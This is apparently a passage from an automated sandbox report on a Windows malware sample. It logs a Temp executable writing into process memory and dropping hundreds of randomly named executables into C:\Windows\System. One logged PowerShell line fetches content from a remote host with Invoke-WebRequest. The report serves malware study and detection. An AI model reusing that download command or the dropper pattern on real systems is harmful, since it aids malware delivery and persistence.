PID 2032 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\wuKxtGb.exe
PID 2032 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\jrJkBtR.exe
PID 2032 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\jrJkBtR.exe
PID 2032 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\jrJkBtR.exe
PID 2032 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\DpPffUU.exe
PID 2032 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\DpPffUU.exe
PID 2032 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\DpPffUU.exe
PID 2032 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\plwcVSe.exe
PID 2032 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\plwcVSe.exe
PID 2032 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\plwcVSe.exe
PID 2032 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\XIolwQx.exe
PID 2032 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\XIolwQx.exe
PID 2032 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\XIolwQx.exe
PID 2032 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\ruJYdIw.exe
PID 2032 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\ruJYdIw.exe
PID 2032 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\ruJYdIw.exe
PID 2032 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\qomRRQh.exe
PID 2032 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\qomRRQh.exe
PID 2032 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\qomRRQh.exe
PID 2032 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\AwKlfSe.exe
PID 2032 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\AwKlfSe.exe
PID 2032 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\AwKlfSe.exe
PID 2032 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\KowXVJs.exe
PID 2032 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\KowXVJs.exe
PID 2032 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\KowXVJs.exe
PID 2032 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\LKiWKYZ.exe
PID 2032 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\LKiWKYZ.exe
PID 2032 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\LKiWKYZ.exe
PID 2032 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\PSBynoL.exe
PID 2032 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\PSBynoL.exe
PID 2032 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\PSBynoL.exe
PID 2032 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\esaXEeA.exe
PID 2032 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\esaXEeA.exe
PID 2032 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\esaXEeA.exe
PID 2032 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\kYXAfdp.exe
PID 2032 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\kYXAfdp.exe
PID 2032 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\kYXAfdp.exe
PID 2032 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\OdxGsxZ.exe
PID 2032 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\OdxGsxZ.exe
PID 2032 wrote to memory of 2544 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\OdxGsxZ.exe
PID 2032 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\zQSJdBd.exe
PID 2032 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\zQSJdBd.exe
PID 2032 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\zQSJdBd.exe
PID 2032 wrote to memory of 308 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\fmKUmOe.exe
PID 2032 wrote to memory of 308 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\fmKUmOe.exe
PID 2032 wrote to memory of 308 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\fmKUmOe.exe
PID 2032 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\wkgZIkI.exe
PID 2032 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\wkgZIkI.exe
PID 2032 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\wkgZIkI.exe
PID 2032 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\TwyXRgD.exe
PID 2032 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\TwyXRgD.exe
PID 2032 wrote to memory of 2784 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\TwyXRgD.exe
PID 2032 wrote to memory of 236 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\YIZgHEr.exe
PID 2032 wrote to memory of 236 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\YIZgHEr.exe
PID 2032 wrote to memory of 236 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\YIZgHEr.exe
PID 2032 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe C:\Windows\System\nqUUmlV.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\2fe4ee43e9874ff2f6bdb7e2e2206040_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\GFhzKPQ.exe

C:\Windows\System\GFhzKPQ.exe

C:\Windows\System\wuKxtGb.exe

C:\Windows\System\wuKxtGb.exe

C:\Windows\System\jrJkBtR.exe

C:\Windows\System\jrJkBtR.exe

C:\Windows\System\DpPffUU.exe

C:\Windows\System\DpPffUU.exe

C:\Windows\System\plwcVSe.exe

C:\Windows\System\plwcVSe.exe

C:\Windows\System\XIolwQx.exe

C:\Windows\System\XIolwQx.exe

C:\Windows\System\ruJYdIw.exe

C:\Windows\System\ruJYdIw.exe

C:\Windows\System\qomRRQh.exe

C:\Windows\System\qomRRQh.exe

C:\Windows\System\AwKlfSe.exe

C:\Windows\System\AwKlfSe.exe

C:\Windows\System\KowXVJs.exe

C:\Windows\System\KowXVJs.exe

C:\Windows\System\LKiWKYZ.exe

C:\Windows\System\LKiWKYZ.exe

C:\Windows\System\PSBynoL.exe

C:\Windows\System\PSBynoL.exe

C:\Windows\System\esaXEeA.exe

C:\Windows\System\esaXEeA.exe

C:\Windows\System\kYXAfdp.exe

C:\Windows\System\kYXAfdp.exe

C:\Windows\System\OdxGsxZ.exe

C:\Windows\System\OdxGsxZ.exe

C:\Windows\System\zQSJdBd.exe

C:\Windows\System\zQSJdBd.exe

C:\Windows\System\fmKUmOe.exe

C:\Windows\System\fmKUmOe.exe

C:\Windows\System\wkgZIkI.exe

C:\Windows\System\wkgZIkI.exe

C:\Windows\System\TwyXRgD.exe

C:\Windows\System\TwyXRgD.exe

C:\Windows\System\YIZgHEr.exe

C:\Windows\System\YIZgHEr.exe

C:\Windows\System\nqUUmlV.exe

C:\Windows\System\nqUUmlV.exe

C:\Windows\System\TsGRgcF.exe

C:\Windows\System\TsGRgcF.exe

C:\Windows\System\NBmPsWh.exe

C:\Windows\System\NBmPsWh.exe

C:\Windows\System\HaaLWqY.exe

C:\Windows\System\HaaLWqY.exe

C:\Windows\System\tesSRpq.exe

C:\Windows\System\tesSRpq.exe

C:\Windows\System\HaHmNuE.exe

C:\Windows\System\HaHmNuE.exe

C:\Windows\System\aVtmRqF.exe

C:\Windows\System\aVtmRqF.exe

C:\Windows\System\CXcwdli.exe

C:\Windows\System\CXcwdli.exe

C:\Windows\System\rqGwdKL.exe

C:\Windows\System\rqGwdKL.exe

C:\Windows\System\wtyCyRe.exe

C:\Windows\System\wtyCyRe.exe

C:\Windows\System\VHDshhB.exe

C:\Windows\System\VHDshhB.exe

C:\Windows\System\CfiMwCr.exe

C:\Windows\System\CfiMwCr.exe

C:\Windows\System\ytXOYLM.exe

C:\Windows\System\ytXOYLM.exe

C:\Windows\System\CYNWhEl.exe

C:\Windows\System\CYNWhEl.exe

C:\Windows\System\VGJNDgU.exe

C:\Windows\System\VGJNDgU.exe

C:\Windows\System\VxUVdEO.exe

C:\Windows\System\VxUVdEO.exe

C:\Windows\System\sPrhiHA.exe

C:\Windows\System\sPrhiHA.exe

C:\Windows\System\upoBeEX.exe

C:\Windows\System\upoBeEX.exe

C:\Windows\System\jjatVnb.exe

C:\Windows\System\jjatVnb.exe

C:\Windows\System\nxQlhyF.exe

C:\Windows\System\nxQlhyF.exe

C:\Windows\System\OQAoIYC.exe

C:\Windows\System\OQAoIYC.exe

C:\Windows\System\arYtlrt.exe

C:\Windows\System\arYtlrt.exe

C:\Windows\System\wsMwUpS.exe

C:\Windows\System\wsMwUpS.exe

C:\Windows\System\ggpHQah.exe

C:\Windows\System\ggpHQah.exe

C:\Windows\System\CiPCINT.exe

C:\Windows\System\CiPCINT.exe

C:\Windows\System\FbHhDUD.exe

C:\Windows\System\FbHhDUD.exe

C:\Windows\System\bkZcoMq.exe

C:\Windows\System\bkZcoMq.exe

C:\Windows\System\kBRvais.exe

C:\Windows\System\kBRvais.exe

C:\Windows\System\lJmIFUq.exe

C:\Windows\System\lJmIFUq.exe

C:\Windows\System\nXKeopX.exe

C:\Windows\System\nXKeopX.exe

C:\Windows\System\PRGFZEI.exe

C:\Windows\System\PRGFZEI.exe

C:\Windows\System\kcHTDSG.exe

C:\Windows\System\kcHTDSG.exe

C:\Windows\System\OkyDvPZ.exe

C:\Windows\System\OkyDvPZ.exe

C:\Windows\System\nAdpbev.exe

C:\Windows\System\nAdpbev.exe

C:\Windows\System\jvaKpBU.exe

C:\Windows\System\jvaKpBU.exe

C:\Windows\System\ZsMPVIF.exe

C:\Windows\System\ZsMPVIF.exe

C:\Windows\System\cWnFBdJ.exe

C:\Windows\System\cWnFBdJ.exe

C:\Windows\System\eWxoLIp.exe

C:\Windows\System\eWxoLIp.exe

C:\Windows\System\GBjFzHj.exe

C:\Windows\System\GBjFzHj.exe

C:\Windows\System\nsiSNhT.exe

C:\Windows\System\nsiSNhT.exe

C:\Windows\System\UFnqJdL.exe

C:\Windows\System\UFnqJdL.exe

C:\Windows\System\EthlXwR.exe

C:\Windows\System\EthlXwR.exe

C:\Windows\System\LhoyONH.exe

C:\Windows\System\LhoyONH.exe

C:\Windows\System\rTFwdQq.exe

C:\Windows\System\rTFwdQq.exe

C:\Windows\System\VgQOVkl.exe

C:\Windows\System\VgQOVkl.exe

C:\Windows\System\XppDyOu.exe

C:\Windows\System\XppDyOu.exe

C:\Windows\System\SoJPygX.exe

C:\Windows\System\SoJPygX.exe

C:\Windows\System\vYMfZPl.exe

C:\Windows\System\vYMfZPl.exe

C:\Windows\System\cYaePgd.exe

C:\Windows\System\cYaePgd.exe

C:\Windows\System\hFXiTVu.exe

C:\Windows\System\hFXiTVu.exe

C:\Windows\System\HCImmFF.exe

C:\Windows\System\HCImmFF.exe

C:\Windows\System\NgdkgeG.exe

C:\Windows\System\NgdkgeG.exe

C:\Windows\System\OAiYoaB.exe

C:\Windows\System\OAiYoaB.exe

C:\Windows\System\tadhYiv.exe

C:\Windows\System\tadhYiv.exe

C:\Windows\System\XUPzXRC.exe

C:\Windows\System\XUPzXRC.exe

C:\Windows\System\AYXEaQn.exe

C:\Windows\System\AYXEaQn.exe

C:\Windows\System\izRaNNq.exe

C:\Windows\System\izRaNNq.exe

C:\Windows\System\shrvSAo.exe

C:\Windows\System\shrvSAo.exe

C:\Windows\System\mhgBwcq.exe

C:\Windows\System\mhgBwcq.exe

C:\Windows\System\teCfaob.exe

C:\Windows\System\teCfaob.exe

C:\Windows\System\kdctVcl.exe

C:\Windows\System\kdctVcl.exe

C:\Windows\System\ucYBUNv.exe

C:\Windows\System\ucYBUNv.exe

C:\Windows\System\kYFKjyj.exe

C:\Windows\System\kYFKjyj.exe

C:\Windows\System\PJBwnKJ.exe

C:\Windows\System\PJBwnKJ.exe

C:\Windows\System\RefsJnI.exe

C:\Windows\System\RefsJnI.exe

C:\Windows\System\qhVvbuX.exe

C:\Windows\System\qhVvbuX.exe

C:\Windows\System\bOhbxtR.exe

C:\Windows\System\bOhbxtR.exe

C:\Windows\System\unEweqF.exe

C:\Windows\System\unEweqF.exe

C:\Windows\System\eDQXCnI.exe

C:\Windows\System\eDQXCnI.exe

C:\Windows\System\gZIunRE.exe

C:\Windows\System\gZIunRE.exe

C:\Windows\System\bBKKSdU.exe

C:\Windows\System\bBKKSdU.exe

C:\Windows\System\atYcBnF.exe

C:\Windows\System\atYcBnF.exe

C:\Windows\System\mxrMsaF.exe

C:\Windows\System\mxrMsaF.exe

C:\Windows\System\TgKjWBX.exe

C:\Windows\System\TgKjWBX.exe

C:\Windows\System\SWBxVUB.exe

C:\Windows\System\SWBxVUB.exe

C:\Windows\System\jdPwCKx.exe

C:\Windows\System\jdPwCKx.exe

C:\Windows\System\qfPutsz.exe

C:\Windows\System\qfPutsz.exe

C:\Windows\System\SOiVBtS.exe

C:\Windows\System\SOiVBtS.exe

C:\Windows\System\KnazHHt.exe

C:\Windows\System\KnazHHt.exe

C:\Windows\System\hibWUPx.exe

C:\Windows\System\hibWUPx.exe

C:\Windows\System\joEzQbR.exe

C:\Windows\System\joEzQbR.exe

C:\Windows\System\tVkaGNq.exe

C:\Windows\System\tVkaGNq.exe

C:\Windows\System\xHEiZOw.exe

C:\Windows\System\xHEiZOw.exe

C:\Windows\System\oEFumZR.exe

C:\Windows\System\oEFumZR.exe

C:\Windows\System\jNHNoVy.exe

C:\Windows\System\jNHNoVy.exe

C:\Windows\System\NGtqEjJ.exe

C:\Windows\System\NGtqEjJ.exe

C:\Windows\System\QQGpfwM.exe

C:\Windows\System\QQGpfwM.exe

C:\Windows\System\EiDIKsx.exe

C:\Windows\System\EiDIKsx.exe

C:\Windows\System\MQwaUxc.exe

C:\Windows\System\MQwaUxc.exe

C:\Windows\System\MIKOOga.exe

C:\Windows\System\MIKOOga.exe

C:\Windows\System\bqcEhZZ.exe

C:\Windows\System\bqcEhZZ.exe

C:\Windows\System\uAJxwID.exe

C:\Windows\System\uAJxwID.exe

C:\Windows\System\aLpxOCj.exe

C:\Windows\System\aLpxOCj.exe

C:\Windows\System\CaFTzjp.exe

C:\Windows\System\CaFTzjp.exe

C:\Windows\System\mVkytGT.exe

C:\Windows\System\mVkytGT.exe

C:\Windows\System\IsfnsPC.exe

C:\Windows\System\IsfnsPC.exe

C:\Windows\System\AEJemXB.exe

C:\Windows\System\AEJemXB.exe

C:\Windows\System\AQJcXnH.exe

C:\Windows\System\AQJcXnH.exe

C:\Windows\System\ftUNluX.exe

C:\Windows\System\ftUNluX.exe

C:\Windows\System\dMgtVst.exe

C:\Windows\System\dMgtVst.exe

C:\Windows\System\PLDwCkA.exe

C:\Windows\System\PLDwCkA.exe

C:\Windows\System\zLeUGGm.exe

C:\Windows\System\zLeUGGm.exe

C:\Windows\System\zmsVExW.exe

C:\Windows\System\zmsVExW.exe

C:\Windows\System\BjhUNcZ.exe

C:\Windows\System\BjhUNcZ.exe

C:\Windows\System\FcmtjWp.exe

C:\Windows\System\FcmtjWp.exe

C:\Windows\System\lMkJvyW.exe

C:\Windows\System\lMkJvyW.exe

C:\Windows\System\RDQzfTQ.exe

C:\Windows\System\RDQzfTQ.exe

C:\Windows\System\oTSPIql.exe

C:\Windows\System\oTSPIql.exe

C:\Windows\System\qgITjsy.exe

C:\Windows\System\qgITjsy.exe

C:\Windows\System\crnBNbK.exe

C:\Windows\System\crnBNbK.exe

C:\Windows\System\gMdLlPO.exe

C:\Windows\System\gMdLlPO.exe

C:\Windows\System\vsYlCOO.exe

C:\Windows\System\vsYlCOO.exe

C:\Windows\System\vrTAiaD.exe

C:\Windows\System\vrTAiaD.exe

C:\Windows\System\ZjwHBsb.exe

C:\Windows\System\ZjwHBsb.exe

C:\Windows\System\fDVxNJK.exe

C:\Windows\System\fDVxNJK.exe

C:\Windows\System\cGJWrJJ.exe

C:\Windows\System\cGJWrJJ.exe

C:\Windows\System\RJEwAhd.exe

C:\Windows\System\RJEwAhd.exe

C:\Windows\System\MrfKbVU.exe

C:\Windows\System\MrfKbVU.exe

C:\Windows\System\qlJrunJ.exe

C:\Windows\System\qlJrunJ.exe

C:\Windows\System\iysTcKG.exe

C:\Windows\System\iysTcKG.exe

C:\Windows\System\BpgUTZe.exe

C:\Windows\System\BpgUTZe.exe

C:\Windows\System\pfwTZha.exe

C:\Windows\System\pfwTZha.exe

C:\Windows\System\nZpeXpc.exe

C:\Windows\System\nZpeXpc.exe

C:\Windows\System\WjiBcIk.exe

C:\Windows\System\WjiBcIk.exe

C:\Windows\System\COoPbpU.exe

C:\Windows\System\COoPbpU.exe

C:\Windows\System\TqxkFjI.exe

C:\Windows\System\TqxkFjI.exe

C:\Windows\System\UfZZSIB.exe

C:\Windows\System\UfZZSIB.exe

C:\Windows\System\rXKFirS.exe

C:\Windows\System\rXKFirS.exe

C:\Windows\System\vgVGtRd.exe

C:\Windows\System\vgVGtRd.exe

C:\Windows\System\AQpGViq.exe

C:\Windows\System\AQpGViq.exe

C:\Windows\System\NFrgCTM.exe

C:\Windows\System\NFrgCTM.exe

C:\Windows\System\QmZcIaJ.exe

C:\Windows\System\QmZcIaJ.exe

C:\Windows\System\ftLOvHf.exe

C:\Windows\System\ftLOvHf.exe

C:\Windows\System\LkUeqeS.exe

C:\Windows\System\LkUeqeS.exe

C:\Windows\System\TrHCEtN.exe

C:\Windows\System\TrHCEtN.exe

C:\Windows\System\axNSUXQ.exe

C:\Windows\System\axNSUXQ.exe

C:\Windows\System\BUIYcIC.exe

C:\Windows\System\BUIYcIC.exe

C:\Windows\System\eHYymlV.exe

C:\Windows\System\eHYymlV.exe

C:\Windows\System\MXRSoOV.exe

C:\Windows\System\MXRSoOV.exe

C:\Windows\System\rewGOeA.exe

C:\Windows\System\rewGOeA.exe

C:\Windows\System\vNsgZjy.exe

C:\Windows\System\vNsgZjy.exe

C:\Windows\System\RbupmSS.exe

C:\Windows\System\RbupmSS.exe

C:\Windows\System\pOggcCv.exe

C:\Windows\System\pOggcCv.exe

C:\Windows\System\uEsdzMQ.exe

C:\Windows\System\uEsdzMQ.exe

C:\Windows\System\VAipHkn.exe

C:\Windows\System\VAipHkn.exe

C:\Windows\System\mRfRqgx.exe

C:\Windows\System\mRfRqgx.exe

C:\Windows\System\YZgzYbw.exe

C:\Windows\System\YZgzYbw.exe

C:\Windows\System\syrekoS.exe

C:\Windows\System\syrekoS.exe

C:\Windows\System\VKcwQSi.exe

C:\Windows\System\VKcwQSi.exe

C:\Windows\System\kESzlof.exe

C:\Windows\System\kESzlof.exe

C:\Windows\System\vWsSSdl.exe

C:\Windows\System\vWsSSdl.exe

C:\Windows\System\dNLyQsg.exe

C:\Windows\System\dNLyQsg.exe

C:\Windows\System\sVheYab.exe

C:\Windows\System\sVheYab.exe

C:\Windows\System\PrbhoHR.exe

C:\Windows\System\PrbhoHR.exe

C:\Windows\System\VQaZauh.exe

C:\Windows\System\VQaZauh.exe

C:\Windows\System\jjlXWyZ.exe

C:\Windows\System\jjlXWyZ.exe

C:\Windows\System\hVDAVpk.exe

C:\Windows\System\hVDAVpk.exe

C:\Windows\System\dQwAOqB.exe

C:\Windows\System\dQwAOqB.exe

C:\Windows\System\rfZzukZ.exe

C:\Windows\System\rfZzukZ.exe

C:\Windows\System\QgpexTh.exe

C:\Windows\System\QgpexTh.exe

C:\Windows\System\tYwxPsj.exe

C:\Windows\System\tYwxPsj.exe

C:\Windows\System\aMbkfuU.exe

C:\Windows\System\aMbkfuU.exe

C:\Windows\System\hgFpNNP.exe

C:\Windows\System\hgFpNNP.exe

C:\Windows\System\ZrkIFEw.exe

C:\Windows\System\ZrkIFEw.exe

C:\Windows\System\PqZqSaP.exe

C:\Windows\System\PqZqSaP.exe

C:\Windows\System\KfScJZl.exe

C:\Windows\System\KfScJZl.exe

C:\Windows\System\maZIzPk.exe

C:\Windows\System\maZIzPk.exe

C:\Windows\System\JjhMUic.exe

C:\Windows\System\JjhMUic.exe

C:\Windows\System\NWpTBIl.exe

C:\Windows\System\NWpTBIl.exe

C:\Windows\System\jrSWSuw.exe

C:\Windows\System\jrSWSuw.exe

C:\Windows\System\bBBOEEW.exe

C:\Windows\System\bBBOEEW.exe

C:\Windows\System\IFPmgge.exe

C:\Windows\System\IFPmgge.exe

C:\Windows\System\sNDdxWP.exe

C:\Windows\System\sNDdxWP.exe

C:\Windows\System\ovqKNFd.exe

C:\Windows\System\ovqKNFd.exe

C:\Windows\System\xPtisqk.exe

C:\Windows\System\xPtisqk.exe

C:\Windows\System\dkmxuyY.exe

C:\Windows\System\dkmxuyY.exe

C:\Windows\System\BApqyRS.exe

C:\Windows\System\BApqyRS.exe

C:\Windows\System\aCUTabk.exe

C:\Windows\System\aCUTabk.exe

C:\Windows\System\txkREPD.exe

C:\Windows\System\txkREPD.exe

C:\Windows\System\dUItUpy.exe

C:\Windows\System\dUItUpy.exe

C:\Windows\System\WLUGzXx.exe

C:\Windows\System\WLUGzXx.exe

C:\Windows\System\mqYvocO.exe

C:\Windows\System\mqYvocO.exe

C:\Windows\System\BxsIuFX.exe

C:\Windows\System\BxsIuFX.exe

C:\Windows\System\idHciIa.exe

C:\Windows\System\idHciIa.exe

C:\Windows\System\LGreDuY.exe

C:\Windows\System\LGreDuY.exe

C:\Windows\System\TKYhnGd.exe

C:\Windows\System\TKYhnGd.exe

C:\Windows\System\hBIoSkN.exe

C:\Windows\System\hBIoSkN.exe

C:\Windows\System\PPSyjxS.exe

C:\Windows\System\PPSyjxS.exe

C:\Windows\System\SWKLsAT.exe

C:\Windows\System\SWKLsAT.exe

C:\Windows\System\jLSzrSf.exe

C:\Windows\System\jLSzrSf.exe

C:\Windows\System\HFZEOSi.exe

C:\Windows\System\HFZEOSi.exe

C:\Windows\System\omBJcez.exe

C:\Windows\System\omBJcez.exe

C:\Windows\System\bgQBCwV.exe

C:\Windows\System\bgQBCwV.exe

C:\Windows\System\iDgnOJJ.exe

C:\Windows\System\iDgnOJJ.exe

C:\Windows\System\NrrvlfI.exe

C:\Windows\System\NrrvlfI.exe

C:\Windows\System\FcrcbGq.exe

C:\Windows\System\FcrcbGq.exe

C:\Windows\System\KYAurbq.exe

C:\Windows\System\KYAurbq.exe

C:\Windows\System\udBqeLr.exe

C:\Windows\System\udBqeLr.exe

C:\Windows\System\iJQZMSA.exe

C:\Windows\System\iJQZMSA.exe

C:\Windows\System\QRUpySq.exe

C:\Windows\System\QRUpySq.exe

C:\Windows\System\rZBkOOJ.exe

C:\Windows\System\rZBkOOJ.exe

C:\Windows\System\PiFSAmH.exe

C:\Windows\System\PiFSAmH.exe

C:\Windows\System\fXjuOiw.exe

C:\Windows\System\fXjuOiw.exe

C:\Windows\System\KiZRSiO.exe

C:\Windows\System\KiZRSiO.exe

C:\Windows\System\iQcfAhl.exe

C:\Windows\System\iQcfAhl.exe

C:\Windows\System\DDnkNYE.exe

C:\Windows\System\DDnkNYE.exe

C:\Windows\System\kMOdiyc.exe

C:\Windows\System\kMOdiyc.exe

C:\Windows\System\AHrKJMc.exe

C:\Windows\System\AHrKJMc.exe

C:\Windows\System\XKkOEdw.exe

C:\Windows\System\XKkOEdw.exe

C:\Windows\System\HyHVhho.exe

C:\Windows\System\HyHVhho.exe

C:\Windows\System\ErCrWjx.exe

C:\Windows\System\ErCrWjx.exe

C:\Windows\System\jHNGPUm.exe

C:\Windows\System\jHNGPUm.exe

C:\Windows\System\YAIVGEq.exe

C:\Windows\System\YAIVGEq.exe

C:\Windows\System\lhcsylL.exe

C:\Windows\System\lhcsylL.exe

C:\Windows\System\BqzynFT.exe

C:\Windows\System\BqzynFT.exe

C:\Windows\System\TIRBNqc.exe

